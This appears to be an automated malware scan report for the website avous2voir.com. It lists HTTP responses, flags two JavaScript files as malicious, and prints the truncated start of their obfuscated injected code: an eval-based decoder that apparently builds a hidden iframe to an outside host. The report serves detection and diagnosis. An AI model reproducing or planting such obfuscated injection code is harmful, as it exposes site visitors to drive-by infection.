Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=avous2voir.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://avous2voir.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 03 Mar 2015 14:06:25 GMT Location: http://www.avous2voir.com/ Server: Apache Content-Length: 298 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.avous2voir.com/ | 200 OK Content-Length: 25860 Content-Type: text/html | clean |
http://www.avous2voir.com/optique_fichiers/js.js | 200 OK Content-Length: 5825 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,67,71,5f,5f,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,67,71,5f,5f,5b,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6a,5c,68,6c,66,60,58,5b,5c,65,5b,69,66,65,25,59,60,71,26,5a,6 Antivirus reports:
| ||
http://avous2voir.com/optique_fichiers/base.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 03 Mar 2015 14:06:26 GMT Location: http://www.avous2voir.com/optique_fichiers/base.js Server: Apache Content-Length: 322 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.avous2voir.com/optique_fichiers/base.js | 200 OK Content-Length: 6793 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,67,71,5f,5f,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,67,71,5f,5f,5b,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6a,5c,68,6c,66,60,58,5b,5c,65,5b,69,66,65,25,59,60,71,26,5a,6 Antivirus reports:
| ||
http://avous2voir.com/Scripts/AC_RunActiveContent.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 03 Mar 2015 14:06:27 GMT Location: http://www.avous2voir.com/Scripts/AC_RunActiveContent.js Server: Apache Content-Length: 328 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.avous2voir.com/scripts/ac_runactivecontent.js | 404 Not Found Content-Length: 296 Content-Type: text/html | clean |
http://www.avous2voir.com/test404page.js | 404 Not Found Content-Length: 280 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: avous2voir.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 03 Mar 2015 14:06:25 GMT
Location: http://www.avous2voir.com/
Server: Apache
Content-Length: 298
Content-Type: text/html; charset=iso-8859-1
...298 bytes of data.
GET / HTTP/1.1
Host: avous2voir.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 03 Mar 2015 14:06:25 GMT
Location: http://www.avous2voir.com/
Server: Apache
Content-Length: 298
Content-Type: text/html; charset=iso-8859-1
...298 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: avous2voir.com
Referer: http://www.google.com/search?q=avous2voir.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: avous2voir.com
Referer: http://www.google.com/search?q=avous2voir.com
Result:
The result is similar to the first query. There are no suspicious redirects found.